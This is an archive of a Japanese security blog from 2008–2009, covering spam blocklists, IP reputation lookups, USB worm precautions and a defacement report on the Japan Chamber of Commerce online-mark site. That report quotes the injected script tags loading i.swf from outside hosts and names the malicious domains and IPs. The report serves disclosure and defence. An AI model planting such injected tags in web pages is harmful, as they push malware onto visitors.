Semantic Web – WordPress

Archive for the ‘スパム スパイウェア ウイルス ワーム’ Category

Spamhaus Block List – SBL – CIDR 32以外

leave a comment »

The Spamhaus Block List (SBL) / スパムギャング (ROKSO) を含む
 http://www.spamhaus.org/sbl/latest.lasso
スパム送信IPとして登録された最新ブラックリストを見ると、今回
CIDR(サイダー)表記
 "http://ja.wikipedia.org/wiki/IPアドレス"
/32 から /22 まで含まれる。対象範囲として前者で1個、後者で1,024個のIPアドレスがブラックリストに指定されたことになる。

広告

Written by support

2009/03/04 at 21:08

Barracuda Spam Firewall – バラクーダ セントラル – 送信者IPアドレス

leave a comment »

迷惑メールを「12の防御層」でブロックする Barracuda Spam Firewall
 http://www.barracudanetworks.com/
は、「[引用] バラクーダレピュテーション解析により・・中略・・送信者のIPアドレスをバラクーダブラックリスト(拒否リスト)、またはバラクーダホワイトリスト(許可リスト)で検索をかけ、Eメールの防御・許可を決定します。他の"(あいまいな)グレイエリア"にあるIPアドレスを持つEメールは、そのまま次の9段階のスパム/ウィルスの防御層で解析されていきます。」
 http://www.barracudacentral.org/lookups
バラクーダ セントラルで送信メールサーバの評価状況がわかります。
図(下段 背景色 ピンク)
 The ip address 2**.***.***.**8 is listed as "poor" on the Barracuda Reputation System. ・・・
では、メール内容の解析前にブロックされます。解除申請後、

図(上段 背景色 グリーン)
 The ip address 2**.***.***.**9 is not currently listed as "poor" on the Barracuda Reputation System.

承認されると、非スパムメールはフィルターを通過します。
ホスティング・サーバーを使用中、共有ユーザーなどのスパム行為により、再び"poor"となるかもしれません。 Barracuda Spam Firewallに送信拒否されないため、送信メールサーバの定期的なチェックをおすすめします。
[投稿/過去・現在]
 http://sb.xrea.com/showthread.php?p=88112#post88112
 http://blog.m3.com/blogosphere/20080717/__-_Barracuda_Reputation_System

Barracudacentral.org / lookup

Written by support

2009/02/25 at 00:42

USB Device Security (2)

leave a comment »

ウイルス対策ソフト内蔵USBメモリ
(1) トレンドマイクロ「Trend Micro USB Security™ for Biz
 Windows Vista, XP, 2000 Pro / Advanced Server SP4
 http://jp.trendmicro.com/jp/products/enterprise/tmusb/

下記2社(※)から販売
※ BUFFALO 株式会社バッファロー
「RUF2-HSCUWシリーズ」
 Windows Vista(32bit/64bit), XP(SP2以降、32bit), 2000(SP4以降)
 http://buffalo.jp/products/catalog/flash/ruf2-hscuw/

※ IODATA アイ・オー・データ機器
「EasyDisk V – xxxMB/xGB」
 Windows Vista(32/64bit), XP SP2以降(32bit), 2000 SP4
 http://www.iodata.jp/product/usbmemory/easydisk/ed-v/index.htm

(2) Virus Chaser「Cshieldstick V
 Windows 98(SE), Me, 2000 Pro(SP3またはSP4), XP (Vista未対応)
 http://www.viruschaser.jp/products/product_cstickv.html

下記会社(※)も販売
※ 株式会社インテリジェント ウェイブ 2005-03-04

Written by support

2008/12/31 at 19:24

USB Device Security

leave a comment »

USBワーム(W32/Autorun、MAL_OTORUNなど)
「USBメモリを差し込んだだけで感染する」というのは、Windows Vistaをデフォルト環境で使用し、自動再生時のダイアログにおいて「常に次の動作を行う」にチェックした場合です。USBメモリを挿すだけで感染する可能性があります。Windows XP(もちろん、Vistaも)では、マイコンピュータ内のドライブアイコンをダブルクリックすると感染しますが、Windows XP はUSBメモリ挿入だけでは感染しません。
基本操作として「Shift キーを押しながら、USB メモリー」を挿入し、(1) ウイルススキャンを実施し、感染がないことを確認するか、(2) マイコンピュータ内のドライブアイコンをダブルクリックしないで、エクスプローラでUSBメモリのフォルダ内にアクセスするか、です。
参考ページ
 http://blog.trendmicro.co.jp/archives/2334
 http://jp.trendmicro.com/jp/threat/solutions/usb/

Written by support

2008/12/26 at 12:24

McAfee SiteAdvisor – Norton Safe Web

leave a comment »

オンラインで Web サイトの検査を行い、安全性について全体的な評価を行うサービスがあります。

McAfee SiteAdvisor
 http://www.siteadvisor.com/
Norton Safe Web
 http://safeweb.norton.com/

【感 想】
McAfee社:検査済みのことが多い。Symantec社:悪質なサイトの照合しやすい。

【その他】
トレンドマイクロ社:Trend プロテクト™「ウイルスバスター2008をすでにお使いで、オンラインユーザ登録がお済みのお客さまのみにご利用いただけるツールです。」
 http://www.trendflexsecurity.jp/security_solutions/trendprotect.php

Written by support

2008/10/08 at 21:03

日本商工会議所オンラインマークの改ざん

leave a comment »

日本商工会議所オンラインマーク総合センター
 http://mark.cin.or.jp/
のオンラインマークが改ざんされており、
ページに不正なスクリプトが埋め込まれています。
マーク使用許可事業者の「オンラインマークの認証関係情報
 商工会議所オンラインマーク地域センターへのリンク中および地域センターの所在地の右端に挿入されています。
ユーザーのシステムに脆弱性があると、このコードによって実行可能ファイルが実行され、マルウェアがダウンロードされるかもしれません。オンラインマークは絶対にクリックしないで下さい。
2008-10-05 7 p.m.

ホームページの不正アクセスと改竄について下記へ連絡しました。

日本商工会議所オンラインマーク総合センター
  メール連絡済 (第一報 Sun, 05 Oct 2008 12:05:51 +0900)
  電話連絡済

情報処理推進機構(IPA)セキュリティセンター(ISEC)
 http://www.ipa.go.jp/security/ciadr/index.html
  留守電メッセージ済
  メール連絡済 (受理 2008-10-06 ca 3 p.m.)

都道府県警察本部のサイバー犯罪相談窓口
 http://www.npa.go.jp/cyber/soudan.htm
  警視庁  長時間電話中で連絡不可
  地元警察本部 電話で情報提供済

JPCERTコーディネーションセンター(JPCERT/CC)
 http://www.jpcert.or.jp/
  メール連絡済(受理 2008-10-06 11 a.m.)

[調査結果]
日本商工会議所オンラインマーク総合センター
オンラインマークの改ざんにより不正に挿入されているドメイン名
2008-10-07時点で、赤矢印の位置の"水平線"は表示されなくなりましたが、不正スクリプトは存在します。
サイト要素の不正スクリプト
drmyy.cn (2008-10-05 4 p.m. 時点の対応グロ-バルIP 211.154.163.43)
 http://safeweb.norton.com/report/show?url=drmyy.cn&x=0&y=0
 http://www.siteadvisor.com/sites/drmyy.cn/summary/

日本商工会議所オンラインマーク総合センターのサイト要素
に含まれていると思われるIPアドレス
  ブラウザ Google Chrome (現時点での最新バージョン 0.2.149.30) BETAによる警告メッセージより
HomepageTampering 081005
125.68.57.154 (2008-10-05 4 p.m. 時点の対応ドメイン ytgw123.cn)
 http://safeweb.norton.com/report/show?url=ytgw123.cn&x=0&y=0
 http://www.siteadvisor.com/sites/ytgw123.cn

 

[追記 2008-10-06]
地元の商工会議所へ電話連絡済

オンラインマークの認証関係情報
 http://mark.cin.or.jp/database/cert-plug-inst.asp?markid=A00000-*-**
2008-10-06 10 p.m. 時点で未対応です。

[追記 2008-10-07]
不正スクリプトは削除されていません。
存在場所を示す"水平線"が表示されないように、サーバ内部で「改悪」処理が行われています。ブラウザで見た人は、不正スクリプトの要素に全く気づきません。
参照ページ:
「SQLインジェクションの仕組み――Webサイトに悪質コードを埋め込む」
 http://itpro.nikkeibp.co.jp/article/COLUMN/20080930/315826/

改ざんの前後でWebサイトの外見が変化することはほとんどない。そのため,エンドユーザーが一見して改ざんに気づくことは難しい。
例外的に,HTML出力時にデータを(投稿者注:改ざん防止対策として)エスケープ処理していたり,タイトル・タグとなるデータが改ざんされたりした場合は,〈script src=http://www.example.com/ngg.js〉〈/script〉といったタグが文字列としてWebサイトに表示されることがある。

不正スクリプトは削除されました。9 p.m.

急 告再び、サーバ乗っ取り?によるオンライン認証関連情報ページの改ざん発見
2008-11-23 午前1時
閲覧者アクセスや検索ロボットの不正サイト登録を予防するため、一部***に変更しました。

【認証機関】日本<script src=http://61.31.***.114/i.swf></script><script src=http://****.co.kr/i.swf></script><script src=http://****.co.kr/i.swf></script>商工会議所オンラインマーク地域センター<br>〒100-0005 千代田区丸の内3-2-2<script src=http://61.31.***.114/i.swf></script><script src=http://****.co.kr/i.swf></script><script src=http://****.co.kr/i.swf></script>

同様の手口ですが、誘導するサイトが前回と異なります。

サイト要素の不正スクリプト
t**-n** (2008-11-23 9 a.m. 時点の対応グロ-バルIP 61.31.235.114)
Viruses Severity: High
 http://safeweb.norton.com/report/show?url=61.31.235.114&x=0&y=0
 http://www.siteadvisor.com/sites/61.31.235.114/summary/

ipkn.co.kr/i.swf (2008-11-23 9 a.m. 時点の対応グロ-バルIP 211.***.62.32)
 http://safeweb.norton.com/report/show?url=ipkn.co.kri/
 http://www.siteadvisor.com/sites/ipkn.co.kri/

  ブラウザ Google Chrome (現時点での最新バージョン 0.3.154.9) BETAによる警告メッセージより
2ndchrome081123.png

 

[追記 2008-11-27] 本日 10 a.m. 当該ページの不正スクリプト削除済確認

Written by support

2008/10/05 at 19:10

迷惑メール振り分けサービスと新たな憂鬱

leave a comment »

(株)ぷららネットワークス(NTTグループ企業)が運営するISP「ぷらら」は、2008年1月31日、「迷惑メール振り分けサービス」を開始した。
 http://www.plala.or.jp/member/option_service/mailplus/antispam/
実際に、4日間でスパムメール約 700通、4MBがサーバ内の迷惑メール専用フォルダ(ジャンクボックス)で一時保管状態となっている。
これまでメールソフトで振り分け、削除していた操作(自動、手動)がなくなり、パソコンを起動するときの憂鬱が一気に解消した。

しかし、自動削除までの2週間で2,000通を超える。大量のspam メールを確認することは、これまで以上に憂鬱な操作である。また、本日ジャンクボックスを閲覧しただけで、サーバエラーが発生した。サーバ負荷などを考えて、1週間程度での自動削除(オプション)をぷらら plala さんに提案した。

Written by support

2008/02/03 at 10:33